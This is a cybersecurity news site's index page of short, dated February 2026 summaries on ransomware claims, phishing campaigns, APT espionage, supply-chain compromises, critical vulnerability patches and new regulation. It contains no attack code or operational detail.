Site Map

Comprehensive index of all cybersecurity intelligence content and resources.

Security Articles

New '0APT' Extortion Group Fakes Data Breach in Bluff Attack on Australian Hospital

A new extortion group calling itself '0APT' has targeted Australia's Epworth HealthCare, claiming to have stolen 920GB of sensitive patient and financial data. The group listed the hospital on its darknet leak site on February 4, 2026, threatening to publish the data if a ransom was not paid. However, Epworth HealthCare conducted a thorough investigation with external cybersecurity experts and found "no verified evidence of any impact to our systems or data." Cybersecurity researchers have corroborated this, assessing that 0APT is likely a "fake" ransomware operation. The group's modus operandi involves posting a high volume of victims without providing credible proof of a breach, instead using empty files or random data streams. This tactic relies on psychological pressure and the threat of reputational damage to extort payment, representing a shift from technical intrusion to pure intimidation.

Feb 9, 2026 · 5 min read

KillSec Ransomware Group Claims Attack on Nigerian Tech Startup Getly

The ransomware group known as KillSec has claimed responsibility for a cyberattack on Getly, a Nigerian technology startup. On February 9, 2026, the group posted the claim on its platform, stating it had breached the company and exfiltrated sensitive data. KillSec has threatened to leak the stolen information if its unspecified ransom demands are not met. Getly, which operates the `getly.app` domain, has not yet publicly commented on the alleged breach, and the claims have not been independently verified. The incident highlights the global reach of ransomware gangs and the increasing risk they pose to startups and small businesses in emerging markets, not just large enterprises.

Feb 9, 2026 · 4 min read

Australia Post Phishing Scam Harvests Credit Card and OTP Data

A widespread phishing campaign is actively targeting Australians by impersonating Australia Post. Cybersecurity firm MailGuard intercepted the scam on February 9, 2026, which uses emails with the subject line "Parcel Awaiting Instructions." The emails claim a delivery has failed due to an incomplete address and trick recipients into clicking a link to pay a small, fraudulent shipping fee of 1.99 AUD. The link leads to a sophisticated, multi-stage credential harvesting site designed to look like an official Australia Post portal. The site first captures the victim's full credit card details and phone number, and then, in a final crucial step, prompts for the one-time passcode (OTP) sent to their mobile. This allows the attackers to authorize fraudulent transactions immediately. The sender's email address is a clear giveaway, and users are advised to be vigilant.

Feb 9, 2026 · 5 min read

AI Supply Chain Attack: Hundreds of Malicious 'Skills' on ClawHub Marketplace Steal Credentials

A significant software supply chain attack is targeting users of the OpenClaw AI assistant through its community marketplace, ClawHub. Security researchers have discovered hundreds of malicious 'skills'—add-ons that extend the AI's functionality—that have been published by threat actors. These skills masquerade as useful tools, such as wallet trackers or content summarizers, but their installation instructions trick users into downloading malware. The primary payloads include the Atomic Stealer infostealer for macOS and other backdoors and keyloggers for Windows. The attack leverages the trusted, open-source nature of the marketplace, which lacked a formal review process for submissions. In response to the discovery by KOI Security and SlowMist, the OpenClaw team has partnered with VirusTotal to automatically scan all skills uploaded to ClawHub to prevent further abuse.

Feb 9, 2026 · 5 min read

'Bloody Wolf' APT Deploys NetSupport RAT in Espionage Campaign

Security researchers have uncovered an active spear-phishing campaign attributed to the threat actor 'Bloody Wolf' (also tracked as Stan Ghouls). The campaign targets organizations primarily in Uzbekistan and Russia, with a focus on manufacturing, finance, and IT sectors, though government and other entities have also been targeted. The attackers use phishing emails with password-protected ZIP archives containing a malicious LNK file. When executed, this file downloads and installs the legitimate remote administration tool, NetSupport RAT, which gives the attackers full control over the victim's system. The motives appear to be mixed, pointing towards both financially motivated cybercrime and state-aligned cyber espionage. This campaign marks a shift in tooling for the group, which previously used the STRRAT malware.

Feb 9, 2026 · 5 min read

China-Linked UNC3886 Hits All Major Singapore Telcos in Coordinated Zero-Day Attack

Singaporean authorities have revealed that all four of the nation's major telecommunication providers were targeted in a sophisticated and coordinated cyber espionage campaign. The attack is attributed to UNC3886, a Chinese-linked advanced persistent threat (APT) group known for targeting critical infrastructure. The attackers exploited a zero-day vulnerability in the telcos' perimeter firewalls to gain initial access. Once inside, the group stole a limited amount of technical data and used advanced techniques to evade detection. While the attackers have not yet penetrated the core networks, officials noted their capability to deploy tools that could disrupt internet and telecommunications services. In response, Singapore has launched one of its largest-ever coordinated cyber defense operations, involving government agencies and the affected telcos working together to hunt for the intruders and harden national infrastructure.

Feb 9, 2026 · 5 min read

BeyondTrust Patches Critical 9.9 CVSS RCE Zero-Day in Remote Access Tools

BeyondTrust has patched a critical zero-day vulnerability, CVE-2026-1731, affecting its self-hosted Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw is a pre-authentication remote code execution (RCE) vulnerability with a CVSS score of 9.9, indicating extreme severity. It allows an unauthenticated attacker to execute arbitrary OS commands on a vulnerable appliance by sending a specially crafted network request, requiring no user interaction. This could lead to a full server compromise. The vulnerability affects RS versions 25.3.1 and earlier, and PRA versions 24.3.4 and earlier. BeyondTrust has already secured its cloud instances, but is urging all on-premise customers to upgrade to the patched versions immediately. The flaw was discovered and responsibly disclosed by a security researcher.

Feb 9, 2026 · 5 min read

CRITICAL: Ivanti Patches Two Actively Exploited RCE Zero-Days in EPMM

Ivanti has released urgent security patches for two critical remote code execution (RCE) vulnerabilities, CVE-2026-1281 and CVE-2026-1340, affecting its Endpoint Manager Mobile (EPMM) solution, formerly MobileIron Core. Both flaws are rated 9.8 out of 10 on the CVSS scale and are confirmed to be actively exploited in the wild as zero-days. An unauthenticated attacker can exploit these vulnerabilities to execute arbitrary code on an affected appliance, granting them access to sensitive mobile device management data. Given the active exploitation, administrators are urged to apply the temporary RPM script patches immediately while awaiting a permanent fix in the upcoming version 12.8.0.0.

Feb 9, 2026 · 5 min read

Nationwide Outage: BridgePay Payment Gateway Confirms Ransomware Attack Crippled Production Systems

U.S. payment gateway provider BridgePay Network Solutions has confirmed a ransomware attack was the cause of a massive service outage that began on February 6, 2026. The attack took down numerous production systems, including the BridgePay Gateway API, virtual terminals, and hosted payment pages, disrupting credit and debit card processing for merchants across the United States in sectors like retail, hospitality, and government. Many businesses were forced to revert to cash-only operations. BridgePay has engaged the FBI and U.S. Secret Service. While the company states that an initial investigation suggests no usable payment card data was exposed due to encryption, a timeline for full service restoration has not been provided, and the process is expected to be lengthy.

Feb 8, 2026 · 4 min read

EDR-Killer Malware Weaponizes Decade-Old EnCase Driver in BYOVD Attacks

Threat actors are using a new EDR-killing malware that leverages a 'Bring Your Own Vulnerable Driver' (BYOVD) technique to disable endpoint security products. Researchers at Huntress discovered the malware during an intrusion that began with compromised SonicWall SSL VPN credentials. The attackers abuse `EnPortv.sys`, a legitimate but long-revoked kernel driver from Guidance Software's EnCase forensic toolkit. Despite its certificate being revoked in 2010, a gap in Windows' driver signature enforcement allows it to be loaded, granting the attackers kernel-level privileges. The malware uses these privileges to terminate 59 different processes associated with major EDR vendors like CrowdStrike, SentinelOne, and Microsoft, clearing the way for ransomware deployment.

Feb 8, 2026 · 4 min read

U.S. Finalizes Ban on Chinese and Russian Tech in Connected Vehicles, Forcing Massive Supply Chain Overhaul

The United States has finalized new regulations from the Commerce Department that will ban hardware and software from China and Russia in connected vehicles sold in the U.S. The rules are designed to mitigate national security risks, preventing foreign adversaries from collecting sensitive data or manipulating vehicle functions. The ban will be phased in, starting with software for the 2027 model year and extending to hardware by 2029. The auto industry is facing what is being called 'one of the most consequential and complex auto regulations in decades,' forcing a massive and difficult overhaul of their deeply embedded global software and hardware supply chains.

Feb 8, 2026 · 4 min read

European Commission Contains Cyberattack on its Mobile Device Management (MDM) System

The European Commission disclosed on February 5, 2026, that it had identified and contained a cyberattack against its central infrastructure for managing mobile devices. The attack, detected on January 30, was reportedly contained and the system cleaned within nine hours. The Commission stated that the incident may have resulted in unauthorized access to some staff names and mobile numbers, but there is no evidence that any mobile devices themselves were compromised. The incident comes shortly after the Commission proposed a new, comprehensive cybersecurity package (CSA2) to strengthen security across the EU.

Feb 8, 2026 · 3 min read

Malicious VS Code Extension 'ClawdBot Agent' Deployed ScreenConnect RAT via Marketplace

A malicious extension named 'ClawdBot Agent' was discovered in the official Visual Studio Code Marketplace, impersonating a popular AI coding assistant to trick developers. The trojanized extension was fully functional, helping it evade suspicion while its malicious payload executed in the background upon VS Code launch. The attack chain fetched a remote configuration file that initiated the deployment of a weaponized version of the legitimate remote support tool, ConnectWise ScreenConnect, effectively turning it into a Remote Access Tool (RAT). This gave attackers full remote control over compromised developer machines. The extension was quickly removed by Microsoft, but the incident highlights the growing risk of supply chain attacks targeting developer ecosystems.

Feb 8, 2026 · 4 min read

EU Proposes Revised Cybersecurity Act to Bolster Supply Chain Security & ENISA's Role

The European Commission has introduced a new cybersecurity package that includes a proposal for a revised Cybersecurity Act (CSA) and targeted amendments to the NIS2 Directive. The initiative aims to strengthen the EU's collective resilience against cyber threats by establishing a framework for ICT supply chain security, promoting 'cyber-secure by design' principles through certification, and enhancing the role of ENISA, the EU's cybersecurity agency. The amendments to NIS2 seek to clarify rules on jurisdiction and streamline ransomware incident data collection. Once adopted, member states will have one year to transpose the new provisions into national law.

Feb 7, 2026 · 4 min read

CISA Adds Critical SmarterMail RCE Flaw to KEV Catalog Amid Active Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in SmarterTools' SmarterMail, CVE-2026-24423, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which allows for unauthenticated RCE, is being actively weaponized by ransomware operators. The vulnerability stems from a missing authentication check in an API endpoint, enabling attackers to execute arbitrary commands on vulnerable email servers. CISA has directed all federal agencies to apply patches by February 26, 2026, and strongly urges all organizations using the affected software to update immediately to mitigate the significant risk of compromise.

Feb 7, 2026 · 5 min read

Transparent Tribe (APT36) Shifts Focus, Targeting Indian Startups with Crimson RAT

The Pakistan-aligned APT group Transparent Tribe (also known as APT36) has strategically shifted its targeting from Indian government and military entities to the country's growing startup sector. A new campaign, identified by researchers, uses the group's signature Crimson RAT malware delivered via malicious ISO files in phishing emails. The lures are themed around startups, with some attacks leveraging scraped personal information of real founders to appear more legitimate. The focus on startups in the cybersecurity and intelligence fields suggests the group aims to steal intellectual property and potentially use compromised companies as a supply chain vector to attack their government clients.

Feb 7, 2026 · 5 min read

Ransomware Gangs Like LockBit and BlackCat Use Legitimate ISP Software for Anonymous Server Provisioning

Researchers at Sophos have discovered how bulletproof hosting (BPH) providers are abusing legitimate server management software from ISPsystem to anonymously provision virtual machines for cybercriminals. The software, VMmanager, leaves a default hostname fingerprint (`WIN-J9D866ESIJ2`) that allowed researchers to link thousands of malicious servers to BPH providers like Stark Industries Solutions and MasterRDP. This infrastructure is actively being used to support operations for top-tier ransomware groups, including LockBit, BlackCat (ALPHV), and Conti, highlighting a critical link between legitimate tools and the cybercrime underworld.

Feb 7, 2026 · 5 min read

Aggressive Odyssey Stealer Malware Campaign Targets macOS Users Globally

A new and aggressive campaign featuring the Odyssey Stealer malware is actively targeting Apple macOS users across the globe. Initially focused on the US and Europe, the attack's reach expanded within 24 hours to South America, Africa, and Asia. Odyssey Stealer is an info-stealer designed to harvest browser credentials, crypto wallets, and system data. This latest variant uses builders to automatically generate unique, obfuscated samples, making it difficult for signature-based antivirus to detect. The malware spreads via social engineering, using fake or cracked software downloads and phishing lures to trick users into installing it.

Feb 7, 2026 · 5 min read

Attackers Abuse Windows Screensaver (.scr) Files to Drop RMM Tools for Persistent Access

A novel attack technique has been observed where threat actors are abusing Windows screensaver (.scr) files as droppers for legitimate remote monitoring and management (RMM) tools. By tricking users into executing a malicious screensaver file, attackers can bypass security controls that might block direct RMM installation. Because .scr files are executables, they can be weaponized to install the RMM software, providing the attacker with persistent, stealthy remote access to the compromised machine for data theft, surveillance, or lateral movement. This method highlights the ongoing trend of attackers using living-off-the-land techniques.

Feb 7, 2026 · 5 min read

Evolving Telegram Phishing Campaign Tricks Users into Approving Account Takeover

A sophisticated phishing campaign targeting Telegram users has re-emerged, using the platform's own features to hijack accounts. As reported by CYFIRMA, the attack tricks users with fake security alerts, directing them to a malicious site or bot that mimics an official Telegram service. The core of the attack is manipulating the user into approving a legitimate-looking authorization prompt for a 'new device' within their own Telegram app. Approving this prompt grants the attacker's device full session access, enabling them to take over the account, read private chats, and exfiltrate data. The campaign highlights the effectiveness of social engineering attacks that exploit user trust in a platform's native functions.

Feb 7, 2026 · 5 min read

Ransomware Attacks on Education Sector Slowed in 2025, But U.S. Remains Top Target

A 2025 report from Comparitech indicates a slowdown in the growth of ransomware attacks against the global education sector. There were 251 attacks recorded worldwide, a slight 2% increase from the previous year. These incidents resulted in at least 3.96 million breached records. The United States was the most affected country with 130 attacks, though this marked a 9% decrease for the nation year-over-year. High-profile incidents included demands of $400,000 against school districts by the Medusa ransomware gang, highlighting the continued financial and operational strain these attacks place on educational institutions.

Feb 7, 2026 · 5 min read

CISA: Critical SmarterMail RCE Flaw Actively Exploited in Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in SmarterTools' SmarterMail, CVE-2026-24423, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score of 9.3, allows an unauthenticated attacker to take full control of a mail server by abusing an API method with a missing authentication check. CISA confirms the vulnerability is being actively used in ransomware campaigns and has mandated that federal agencies patch by February 26, 2026. All organizations using the affected email server software are strongly urged to update to build 9511 or later immediately.

Feb 6, 2026 · 5 min read

CISA Issues Directive Forcing Removal of Unsupported Edge Devices from Federal Networks

In response to increasing exploitation by nation-state actors, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Binding Operational Directive (BOD) 26-02. The directive mandates that all Federal Civilian Executive Branch (FCEB) agencies inventory and remove all unsupported network edge devices, such as firewalls and routers, within one year. Devices that are end-of-life (EOL) or end-of-support (EOS) no longer receive security updates and represent a significant risk. The order requires agencies to replace unsupported hardware and software, report their inventory to CISA, and establish a mature lifecycle management process to prevent future risks from technical debt.

Feb 6, 2026 · 5 min read

Betterment Data Breach Exposes 1.4M Customers After Social Engineering Attack

Automated investment platform Betterment has disclosed a data breach affecting 1.4 million customers, originating from a sophisticated social engineering attack. Threat actors, claiming to be the 'ShinyHunters' group, used voice phishing (vishing) to manipulate employees and steal Okta single sign-on codes, gaining access to third-party marketing and support systems. The compromised data includes names, email addresses, phone numbers, and physical addresses. While core financial accounts were not compromised, the attackers used the stolen contact information to launch a fraudulent cryptocurrency scam targeting Betterment's customers. The incident highlights the growing threat of social engineering targeting employees to bypass technical security controls.

Feb 6, 2026 · 6 min read

Financial Sector Cyberattacks Doubled in 2025, Fueled by Geopolitical Hacktivism

A new report from Check Point Software reveals a dramatic escalation in cyber threats targeting the global financial sector, with incidents more than doubling in 2025. The primary driver was a 105% increase in Distributed Denial-of-Service (DDoS) attacks, which were largely motivated by geopolitically driven hacktivism rather than direct financial gain. Hacktivist campaigns aimed to disrupt banking portals and payment systems in countries involved in geopolitical conflicts, including Israel, the U.S., and Ukraine. The report also highlights a 73% jump in data breaches and the persistent threat of multi-extortion ransomware, indicating a complex and evolving threat landscape for financial institutions.

Feb 6, 2026 · 5 min read

Critical RCE Flaw in n8n Automation Platform Allows Full Server Takeover

A critical sandbox escape vulnerability, CVE-2026-25049, has been discovered in the popular n8n workflow automation platform. The flaw, rated 9.4 on the CVSS scale, allows an authenticated user with permission to edit workflows to bypass security controls and execute arbitrary system commands on the host server. This could lead to a full server compromise, exposing sensitive credentials, API keys, and OAuth tokens stored in the environment. The vulnerability is a bypass for a previously patched RCE flaw, and administrators are urged to update to n8n versions 1.123.17 or 2.5.2 immediately to prevent potential hijacking of connected cloud services and AI pipelines.

Feb 6, 2026 · 5 min read

New 'Milkyway' Ransomware Strain Surfaces with Aggressive Extortion Tactics

A new Windows-based ransomware strain named 'Milkyway' has been identified by researchers at CYFIRMA. Currently in a developing state, the malware encrypts files and appends a '.milkyway' extension. It employs aggressive extortion tactics via a full-screen ransom note, threatening not only to leak or sell stolen data but also to report victims to tax authorities and law enforcement if the ransom is not paid. The operators also threaten to contact the victim's clients and partners. Experts warn that Milkyway could evolve into a more sophisticated threat, potentially adopting a Ransomware-as-a-Service (RaaS) model, which would significantly broaden its impact.

Feb 6, 2026 · 5 min read

Everest Ransomware Group Claims Attack on Japanese Manufacturer Hosokawa Micron

The Everest ransomware group has claimed responsibility for a cyberattack against Hosokawa Micron Corporation, a leading Japanese manufacturer of industrial processing technology. The group announced the breach on an underground forum, threatening to publish approximately 30 GB of exfiltrated confidential company data if their ransom demands are not met. This incident aligns with Everest's typical double-extortion strategy. The group is known for targeting organizations in manufacturing, finance, and IT across the U.S., Europe, and Asia, and also acts as an initial access broker, selling network access to other threat actors.

Feb 6, 2026 · 5 min read

Substack Discloses Data Breach Exposing User Contact Information

The newsletter platform Substack has announced it suffered a data breach after discovering on February 3, 2026, that an unauthorized party had gained access to a database containing user information. The exposed data includes names, email addresses, phone numbers, and Stripe IDs, though the company stated that financial data like credit card numbers and passwords were not compromised. The data exposure may date back to October 2025. With over 20 million active users, Substack is warning customers to be wary of suspicious emails and text messages, as a hacker has claimed to have stolen data from 700,000 users and posted it on the dark web.

Feb 6, 2026 · 5 min read

'Shadow Campaign' Hacks Governments in 37 Countries, China-Linked Group Suspected

Security researchers have uncovered a massive, long-running cyber-espionage operation dubbed 'Shadow Campaign.' The campaign is attributed to a suspected Chinese nation-state group, TGR-STA-1030, and has successfully compromised at least 70 government and critical infrastructure organizations in 37 countries. The group's reconnaissance activities have been even broader, targeting government infrastructure in 155 countries. Targets include high-value entities like national law enforcement, border control, finance ministries, and telecommunications companies. The operational footprint, including tools and timezone activity (GMT+8), strongly points towards a China-based actor.

Feb 5, 2026 · 5 min read

Cisco and F5 Release Urgent Patches for High-Severity DoS and RCE Vulnerabilities

Networking giants Cisco and F5 have released a wave of security updates to address multiple high-severity vulnerabilities across their product lines. Cisco patched five flaws, including a remote DoS bug in TelePresence/RoomOS (CVE-2026-20119) and a root-level command execution flaw in Meeting Management software (CVE-2026-20098). Concurrently, F5 addressed five vulnerabilities in its BIG-IP and NGINX products, two of which are rated high-severity: a DoS flaw in BIG-IP (CVE-2026-22548) and a man-in-the-middle vulnerability in NGINX (CVE-2026-1642). Customers are strongly advised to apply the patches promptly to mitigate risks of service disruption and system compromise.

Feb 5, 2026 · 4 min read

Chinese APT 'Amaranth-Dragon' Hits Southeast Asian Governments with WinRAR Exploit

A newly identified China-linked APT group, dubbed 'Amaranth-Dragon,' is conducting targeted cyber espionage campaigns against government and law enforcement agencies in Southeast Asia. The group, believed to be affiliated with the broader APT41 ecosystem, is exploiting a known WinRAR vulnerability (CVE-2025-8088) for initial access. Amaranth-Dragon demonstrates a high degree of stealth, using custom tools like 'Amaranth Loader' and a new 'TGAmaranth RAT' that leverages Telegram for command-and-control. The campaigns are tightly scoped, targeting countries like Cambodia, Thailand, and the Philippines, and appear to be motivated by geopolitical intelligence gathering.

Feb 5, 2026 · 5 min read

Voicemail-Themed Phishing Campaign Deploys Legitimate RMM Tools for Backdoor Access

A widespread social engineering campaign is using convincing voicemail-themed lures to trick victims into installing legitimate remote monitoring and management (RMM) software. The attack begins with an email, often from a bank-themed subdomain, leading to a webpage that prompts the user to 'listen to your message.' Instead of playing a message, the page guides the user through a series of installation steps for a legitimate tool called 'Remotely RMM.' Once installed, the software enrolls the device into an attacker-controlled environment, providing them with persistent remote access for data theft and further malware deployment.

Feb 5, 2026 · 4 min read

Microsoft Mandates TLS 1.2 for Azure Blob Storage, Sunsetting Older Versions

Microsoft has officially deprecated support for Transport Layer Security (TLS) versions 1.0 and 1.1 for its Azure Blob Storage service, effective February 3, 2026. TLS 1.2 is now the minimum required version for all new and existing blob storage accounts across all Azure clouds. This mandatory security enhancement aims to protect data in transit from known cryptographic vulnerabilities present in the older protocols. Customers with applications or clients still relying on TLS 1.0 or 1.1 must update them to ensure continued connectivity and avoid service disruptions.

Feb 5, 2026 · 3 min read

Futile Ransom: Nitrogen Ransomware Contains Fatal Coding Error, Decryption Impossible

In a case of profound operational failure, security researchers have discovered a fatal coding error in the Nitrogen ransomware group's malware that targets VMware ESXi systems. The flaw, found in the encryption routine, causes the malware to use the wrong public key during the encryption process. As a result, the decryptor provided by the gang after a ransom is paid is mathematically incapable of reversing the encryption. This means that any victim who pays the ransom for their encrypted ESXi virtual machines has zero chance of recovering their data, reinforcing law enforcement advice to not pay ransoms.

Feb 5, 2026 · 4 min read

UK Advances New Bill to Regulate Managed Service Providers (MSPs)

The United Kingdom government is advancing a new Cyber Security and Resilience Bill aimed at strengthening the nation's digital supply chain. A key provision of the bill is to bring Managed Service Providers (MSPs) under direct regulatory oversight for the first time. Citing the systemic risk demonstrated by attacks like the one on Synnovis that impacted the NHS, the legislation will impose security duties on MSPs similar to those already applied to essential services. The goal is to establish a higher baseline of security across the thousands of organizations that rely on MSPs for their IT and security operations.

Feb 5, 2026 · 5 min read

SolarWinds Discloses Five Critical RCE & Auth Bypass Flaws in Web Help Desk

SolarWinds has disclosed a set of five critical vulnerabilities in its Web Help Desk (WHD) platform, a tool used by over 300,000 organizations. The flaws include two unauthenticated remote code execution (RCE) vulnerabilities and two authentication bypasses, each with a CVSS score of 9.8. This incident highlights a troubling pattern of recurring patch failures, as one of the new flaws, CVE-2025-40553, is the second bypass of an original deserialization vulnerability (CVE-2024-28986) first patched in 2024. Given the critical nature of the flaws, organizations with internet-facing WHD instances are at extreme risk and must patch immediately.

Feb 5, 2026 · 5 min read

CISA Criticized for Silently Updating KEV Catalog with Ransomware Data

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is facing criticism for its practice of silently updating its Known Exploited Vulnerability (KEV) catalog. In 2025, the agency updated 59 entries to indicate that the flaws were being used in ransomware attacks, but it did not issue any notifications for these changes. Security experts argue that this lack of communication is a significant missed opportunity for defenders, who use the ransomware designation as a key factor in prioritizing patching.

Feb 4, 2026 · 4 min read

Massive AT&T Customer Dataset with 148M SSNs Resurfaces in Criminal Circles

A massive and highly sensitive dataset allegedly containing the personal information of AT&T customers has resurfaced and is being circulated in criminal forums. The data trove reportedly includes approximately 176 million records, featuring over 133 million full names and addresses, and, most critically, up to 148 million full and partial Social Security numbers. The re-emergence of this consolidated data poses a severe and renewed risk of identity theft, phishing, and fraud for millions of individuals.

Feb 4, 2026 · 5 min read

LinkedIn Phishing Campaign Targets Executives Using Legitimate Pen-Testing Tools

A new phishing campaign discovered by ReliaQuest is abusing LinkedIn's private messaging feature to target executives and IT professionals. The attackers use social engineering to trick victims into downloading and running a malicious archive file. The attack's novelty lies in its use of a legitimate, open-source Python script designed for penetration testing. This 'living off the land' technique makes the malicious activity difficult to distinguish from normal administrative tasks, significantly reducing the risk of detection by security software.

Feb 4, 2026 · 4 min read

Fake LINE Messenger Installer Spreads ValleyRAT Malware

A malware campaign attributed to the Silver Fox APT group is distributing the ValleyRAT remote access trojan by disguising it as an installer for the popular LINE messaging app. The campaign, which primarily targets Chinese-speaking users, uses the trojanized software as a lure to infect systems. Once installed, ValleyRAT establishes persistence and focuses on stealing user credentials, leveraging advanced evasion techniques to remain undetected.

Feb 4, 2026 · 4 min read

Critical Flaws in Django Framework Expose Sites to DoS and SQL Injection

The maintainers of the Django web framework have released important security updates to address critical vulnerabilities. The flaws could allow remote attackers to conduct Denial-of-Service (DoS) and potential SQL injection attacks against web applications built with the framework. Due to the severity of these issues, which could lead to service disruption and data compromise, administrators are strongly urged to patch their Django instances immediately.

Feb 4, 2026 · 4 min read

Critical RCE Flaw in Ingress-NGINX Threatens Kubernetes Clusters

A critical vulnerability has been discovered in the widely used Ingress-NGINX controller for Kubernetes. The flaw could allow a remote attacker to achieve arbitrary code execution within the context of the ingress controller. A successful exploit could lead to a full compromise of the ingress, enabling traffic interception, data theft, and providing a powerful foothold for lateral movement into the underlying Kubernetes cluster environment. Users are urged to patch immediately.

Feb 4, 2026 · 5 min read

Samsung's February 2026 Update Fixes 37 Flaws in Galaxy Devices

Samsung has released its February 2026 security update for its Galaxy smartphones, tablets, and foldable devices. The update addresses a total of 37 vulnerabilities. This includes 25 patches from Google for the core Android OS and 12 Samsung-specific patches (SVEs) for its One UI software. The Samsung-specific fixes address flaws rated as high and moderate severity, including an access control vulnerability in the 'Emergency Sharing' feature. Users are advised to install the update promptly.

Feb 4, 2026 · 3 min read

Google Patches Multiple Vulnerabilities in February 2026 Pixel Update

Google has released its monthly security update for all supported Pixel devices as part of its February 2026 patch cycle. The update addresses numerous security vulnerabilities detailed in the Android and Pixel-specific security bulletins. Installing the update will bring all supported Pixel devices to the 2026-02-05 patch level, ensuring they are protected against the latest discovered threats. The update also includes various functional improvements.

Feb 4, 2026 · 3 min read

UK Law Criminalizing AI-Generated Deepfake Intimate Images Takes Effect

A new law in the United Kingdom is set to come into force on February 6, 2026, making it a criminal offense to create or share AI-generated 'deepfake' intimate images of an adult without their consent. The law, part of the Data (Use and Access) Act 2025, amends the Sexual Offences Act 2003 to specifically address the malicious use of artificial intelligence to create harmful and abusive content. This legislative action is a direct response to the growing problem of non-consensual deepfake pornography.

Feb 4, 2026 · 3 min read

Notepad++ Update Mechanism Hijacked in 6-Month Supply Chain Attack by Chinese APT

The maintainers of the widely-used Notepad++ text editor have disclosed a major supply chain attack that compromised their update infrastructure for six months in 2025. The attack, attributed to the Chinese espionage group Lotus Blossom (Billbug), involved hijacking update requests to selectively deliver a custom backdoor named 'Chrysalis' and other malware like Cobalt Strike to a targeted set of organizations. Victims were primarily located in Southeast Asia and included government and financial entities, highlighting a sophisticated, long-running espionage campaign.

Feb 3, 2026 · 7 min read

Qilin Ransomware Claims Breach of Tulsa International Airport, Leaks Data

The Russian-affiliated Qilin ransomware group has claimed responsibility for a cyberattack against Tulsa International Airport. The group has listed the airport on its data leak site, alleging the theft of sensitive data including financial records and employee information. While airport operations reportedly remain unaffected, the incident highlights the ongoing trend of ransomware gangs targeting critical infrastructure. Qilin has been identified as a highly active group, responsible for a significant number of recent attacks.

Feb 3, 2026 · 5 min read

Sophisticated Phishing Attack Uses PDF Lures and Cloud Services to Steal Dropbox Credentials

A new, multi-stage phishing campaign is using procurement-themed emails with benign-looking PDF attachments to bypass email security filters. The attack chain redirects victims through a legitimate cloud service, Vercel Blob, before presenting a convincing fake Dropbox login page. The goal is to harvest corporate credentials, which are then exfiltrated to an attacker-controlled Telegram bot. This layered approach is designed to appear legitimate and evade detection by both automated systems and wary users.

Feb 3, 2026 · 5 min read

Canada Computers Discloses Data Breach Affecting Guest Checkout Customers

Canada Computers Inc., a major Canadian electronics retailer, has announced a data breach that exposed the personal and credit card information of customers. The incident affected individuals who used the 'guest' checkout feature on the company's website between December 29, 2025, and January 22, 2026. The company discovered the breach on January 22 and has since launched an investigation with law enforcement. Customers who were logged into member accounts are not believed to be affected.

Feb 3, 2026 · 5 min read

Play Ransomware Hits US Instrument Manufacturer Deatak in Data Breach

The Play ransomware group has claimed another victim in the manufacturing sector, listing U.S.-based instrument maker Deatak on its data breach forum. The attackers allege they have compromised and exfiltrated a wide range of private and confidential data, including client documents, employee payroll details, and financial information. This attack underscores the persistent threat that ransomware poses to specialized manufacturing firms, which often possess valuable intellectual property and sensitive corporate data.

Feb 3, 2026 · 5 min read

INC Ransomware Group Breaches Two U.S. Law Firms, Leaks Sensitive Client Data

The INC ransomware group is actively targeting the U.S. legal sector, claiming responsibility for attacks on at least two law firms: Hawk Law Group and Eisenberg Lowrance Lundell Lofgren. The group alleges it has stolen highly sensitive client information, including data related to civil and criminal litigation cases, government-issued IDs, and personal details. These attacks highlight the significant risk faced by law firms, which are high-value targets for cybercriminals due to the confidential nature of the data they hold.

Feb 3, 2026 · 5 min read

Ransomware Attack Cripples City of New Britain, CT, Forcing Manual Operations

A ransomware attack has caused significant and ongoing disruption to the municipal network systems of New Britain, Connecticut. The attack, which began last week and was later confirmed as ransomware, has impacted the city's entire internet server. As a result, city departments have been forced to abandon digital systems and revert to manual 'pen and paper' operations. Federal authorities have been called in to assist with the investigation and response efforts.

Feb 3, 2026 · 5 min read

FCC Warns Telecoms of 4x Increase in Ransomware, Urges Better Security

The U.S. Federal Communications Commission (FCC) has issued a formal alert to the telecommunications industry regarding the escalating threat of ransomware. Citing data that shows a fourfold increase in attacks on the sector between 2022 and 2025, the FCC's Public Safety and Homeland Security Bureau is urging providers to adopt fundamental cybersecurity best practices. The warning emphasizes that vulnerable communications networks pose a significant risk to national security and public safety, and calls for actions like patching, MFA, and network segmentation.

Feb 3, 2026 · 5 min read

Health-ISAC Report: AI-Enabled Attacks Named Top Threat to Healthcare Sector in 2026

The Health Information Sharing and Analysis Center (Health-ISAC) has released its 2026 Global Health Sector Threat Landscape report, identifying AI-enabled attacks as the number one projected concern for the year. Based on surveys of healthcare executives and security professionals, the report highlights a shift in focus towards emerging, sophisticated threats. Alongside AI, the report emphasizes the persistent dangers of major supply chain vulnerabilities and the continued high impact of ransomware. The findings, drawn from extensive data including over 1,200 targeted alerts in 2025, urge healthcare organizations to move towards a more proactive and resilient security posture.

Feb 2, 2026 · 4 min read

Open VSX Marketplace Hit by Supply Chain Attack Spreading "GlassWorm" Malware

On January 30, 2026, the Open VSX Registry, a popular marketplace for Visual Studio Code extensions, fell victim to a supply chain attack. Threat actors compromised the account of a legitimate developer, 'oorzc', and published malicious updates to four of their popular extensions. These updates embedded the 'GlassWorm' malware loader. The compromised extensions had been downloaded over 22,000 times, exposing a large number of developers to the malware before the malicious versions were removed by the Open VSX security team.

Feb 2, 2026 · 4 min read

Microsoft Patches Actively Exploited Office Zero-Day (CVE-2026-21509) Under Targeted Attack

Microsoft has released an emergency out-of-band security update for CVE-2026-21509, a high-severity security feature bypass vulnerability in Microsoft Office. The flaw, which has a CVSS score of 7.8, is being actively exploited in targeted attacks, allowing attackers to bypass Object Linking and Embedding (OLE) protections by tricking users into opening malicious documents. In response to the in-the-wild exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to apply the patch by February 16, 2026. The update applies to Office 2016, Office 2019, and Office LTSC, while Microsoft 365 Apps customers will receive a service-side update.

Feb 2, 2026 · 5 min read

New "Pulsar RAT" Evades Detection with In-Memory Execution and LoTL Techniques

